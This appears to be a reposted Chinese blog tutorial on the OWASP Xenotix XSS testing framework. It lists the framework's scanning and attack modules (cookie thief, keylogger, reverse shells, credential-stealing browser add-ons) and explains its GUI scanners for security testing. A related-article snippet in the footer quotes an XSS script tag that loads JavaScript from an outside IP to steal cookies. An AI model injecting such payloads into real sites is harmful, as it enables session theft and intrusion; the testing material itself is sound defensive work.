OWASP出品:Xenotix XSS漏洞测试框架及简单使用

最新推荐文章于 2024-05-03 19:27:54 发布
最新推荐文章于 2024-05-03 19:27:54 发布
阅读量819 收藏 2
点赞数
文章标签: shell javascript php ViewUI
原文链接:http://www.cnblogs.com/h4ck0ne/p/5154682.html
版权

OWASP Xenotix XSS Exploit Framework是一个高效的跨站脚本漏洞(XSS)检测和攻击测试框架。它通过特有的三大浏览器引擎(包括Trident, WebKit和Gecko)进行安全扫描检测,并且其号称拥有全世界第二大的XSS测试Payload,同时具有WAF绕过能力。

扫描模块

Manual Mode Scanner

Auto Mode Scanner

DOM Scanner

Multiple Parameter Scanner

POST Request Scanner

Header Scanner

Fuzzer

Hidden Parameter Detector

信息采集模块

Victim Fingerprinting

Browser Fingerprinting

Browser Features Detector

Ping Scan

Port Scan

Internal Network Scan

攻击测试模块

Send Message

Cookie Thief

Phisher

Tabnabbing

Keylogger

HTML5 DDoSer

Executable Drive By

JavaScript Shell

Reverse HTTP WebShell

Drive-By Reverse Shell

Metasploit Browser Exploit

Firefox Reverse Shell Addon (Persistent)

Firefox Session Stealer Addon (Persistent)

Firefox Keylogger Addon (Persistent)

Firefox DDoSer Addon (Persistent)

Firefox Linux Credential File Stealer Addon (Persistent)

Firefox Download and Execute Addon (Persistent)

附加工具

WebKit Developer Tools

Payload Encoder

下载地址

https://www.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&setlang=es

 

二:使用Xenotix_XSS框架进行自动化安全测试

 

配置服务器:

点击"setting—>configure server—>start",服务器就配置完成。

扫描测试

scanner里面的"get request manualmode"是手动测试,即每次点击start的时候,只会执行一个payload,而"get request auto mode"是自动测试,设置时间间隔,就可以自动扫描。每次扫描的结果会在下面的三个浏览器中显示结果。

URL填写要测试的页面,parmeter填写"参数=",测试时完整的URL可以在Browse处看到。

手动测试:

 

自动测试:

自动模式,在Inteval中设置时间间隔,然后点击start开始测试,可以点击pause暂停

   

多参数测试multiple parameter scanner:

点击"get parameters"会自动识别出URL中的多个参数,设置时间间隔后,点击start会逐个对每次参数进行测试。

URL fuzzer:

将需要fuzz的参数值修改为" [X]",然后工具会对设置了[X]的参数进行测试

POST request scanner:

URL填写要测试的页面

Parameters填写POST的参数,参数值用[X]代替,response会在页面和postresponse body里面显示。

request repeater:

repeater里面支持get、post和trace方法,同样的,将HOST填写地址,path填写路径,参数值用[X]代替,start开始扫描

DOM SCAN:

个人写了几个DOM脚本,结果都没扫描到。。。没法截图了

   

隐藏表单检测:hidden parameter detector

很明显,就是检测html中的隐藏表单。

在tool下面的encode/decode工具也是比较常用的,不过编码不是太多:

 

转载于:https://www.cnblogs.com/h4ck0ne/p/5154682.html

weixin_30598225
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Xenotix XSS Exploit Framework
03-01
Xenotix XSS Exploit Framework,强大的XSS漏洞测试工具
Xenotix_XSS_Exploitation_Framework
01-07
Xenotix XSS Exploit Framework是一款用于检测和利用WEB应用程序中的XSS漏洞的渗透测试工具。这个工具可以将代码注入到含有xss漏洞的web页面中。 Xenotix的主要特点: •内置XSS Payloads •XSS键盘记录 •XSS Executable Drive-by downloader •自动化XSS测试XSS编码
2024年网络安全最全OWASP-TOP-10漏洞XSS_渗透漏洞wotp10
最新发布
2401_84297455的博客
05-03 1342
1.URL进入服务器时自动进行一次默认解码2.进入deny方法之前进行参数处理时,会通过mergeParams方法中的urldecode函数进行第二次解码3.在创建连接操作helper::createLink()中,通过parse_str()函数进行第三次编码环境:windows11+phpstudyV8+php5.4.45+apache程序框架:骑士cms V3.4.0特点:存储型xss,过滤绕过。
OWASP出品Xenotix XSS漏洞测试框架
cnbird's blog
08-08 1983
OWASP Xenotix XSS Exploit Framework是一个高效的跨站脚本漏洞XSS)检测和攻击测试框架。它通过特有的三大浏览器引擎(包括Trident, WebKit和Gecko)进行安全扫描检测,并且其号称拥有全世界第二大的XSS测试Payload,同时具有WAF绕过能力。 扫描模块 Manual Mode Scanner Auto Mode Scanner
OWASP TOP10漏洞——XSS入门级理解,小白也能一看就会
weixin_46108049的博客
01-16 1589
记录学习记录成长XSS(Cross Site Scripting)即跨站脚本如果直接拿文字看定义相必是难以理解。
xssowasp
qq_1062290728的博客
03-19 556
原文 Cross Site Scripting (XSS) 跨站脚本攻击 概述 xss是注入攻击的一种,它将恶意脚本注入到可信任的网站中。xss攻击在攻击者使用web应用发送恶意代码时(通常以浏览器脚本的形式)给其他用户时发生。产生此漏洞的地方非常多,且web应用在其未经验证的输出中使用来自用户的输入时的任何地方均会发生。 攻击者可以使用xss发送恶意脚本给用户。客户端的浏览器没办法知道此脚本不受信任,并将执行此脚本。因为它认为此脚本来自来可信的资源,恶意脚本能够访问任何cookies、会话令牌或其他有关浏
OWASPXSS
weixin_64158899的博客
10-11 49
DVWA靶场练习
OWASP 之跨站脚本xss基础技能
wutiangui的博客
06-12 1388
简单来说DOM文档就是一份XML文档,当有了DOM标准之后,DOM便将前端html代码化为一个树状结构,方便程序和脚本能够轻松的动态访问和更新这个树状结构的内容、结构以及样式,且不需要经过服务端,所以DOM型xss在js前端自己就可以完成数据的输入输出,不与服务器产生交互,这样来说DOM型xss也可以理解为反射性xss。使别的用户访问都会执行相应的嵌入代码。攻击者将已经构造完成的恶意页面发送给用户,用户访问看似正常的页面后收到攻击,这类XSS通常无法直接在URL中看到恶意代码,具有较强的持久性和隐蔽性。
XSS 攻击与防御 | OWASP 提供XSS防御方案
sunpx3的博客
08-10 5941
      作为搞WEB的JAVA程序员,前台很容易碰到xss类的漏洞,但又不具备专业的安全知识,工作中项目紧的时候又没时间去研究那东西,所以就需要一个拿来就能用的,安全性合格的xss防御方法。      很幸运OWASP就提供了一个供java开发使用xss防御方案。OWASP Java Encoder Project      OWASP的大名相信搞安全的同学都熟的不能再熟了,OWASP是一...
Nettacker:自动化渗透测试框架
04-28
创建OWASP Nettacker项目是为了自动进行信息收集,漏洞扫描并最终生成网络报告,包括服务,错误,漏洞,配置错误和其他信息。 该软件将利用TCP SYN,ACK,ICMP和许多其他协议来检测和绕过Firewall / IDS / IPS设备...
pwn2exploit, 所有的文件 pwn &利用.zip
10-09
pwn2exploit, 所有的文件 pwn &利用 pwn &利用这是些前段时间研究二进制的一些心得纸张。本来是希望能够从底层原理到全局把控的层次去整理。这里只完成了部分的Paper。还有很多的Paper只写了概要点。linux进程动态so注入。md这篇文章介绍了如何在目前
Windows Exploit 开发教程(Massimiliano Tomassoli)
01-11
Windows Exploit 开发教程(Massimiliano Tomassoli)
JSP安全开发之XSS漏洞详解
10-21
6. **XSS防御框架**:考虑使用专门的XSS防御库,如OWASP Java Encoder项目,提供安全的字符串输出函数。 7. **代码审查**:定期进行代码审查,检查可能的XSS漏洞,并确保所有用户输入都经过了适当的安全处理。 8. ...
计算机病毒与防护:OWASPTOP与常见漏洞讲解下.ppt
06-10
* * * * * * * * * * * * OWASP TOP10与常见 漏洞讲解下 失效的访问控制就是越权访问漏洞 A5:2017失效的访问控制(业务逻辑漏洞) 失效的访问控制就是越权访问漏洞 A5:2017失效的访问控制(业务逻辑漏洞) 失效的访问...
CSRFTester:一款CSRF漏洞的安全测试工具
01-31
owasp_korean:更新owasp测试指南v4韩国版
05-10
我们可以了解到OWASP测试指南涵盖了一系列关键的安全测试领域,如输入验证、输出编码、身份验证和会话管理、访问控制、错误处理、加密、SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF)、文件包含漏洞、敏感数据...
mutillidae平台:XSS Payload 之cookie窃取练习
whiteinblack
09-26 2118
此次练习主要是用mutillidae靶场实现了《白帽子讲web安全》上的xss payload 窃取用户cookie实例。 需要创建两个用户进行测试:墨中白,test 用账号墨中白进入xss blog练习页面: 在文本框中插入代码 <script type="text/javascript" src="http://47.116.10.120/wxx.js"></s...
最好用的开源Web漏扫工具梳理
m0_60571990的博客
12-11 470
最好用的开源Web漏扫工具梳理
JAVA Web应用常见漏洞与修复建议
12-09
电子版-JAVA Web应用常见漏洞与修复建议, 博客地址:https://blog.csdn.net/qq877507054/article/details/134491269

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值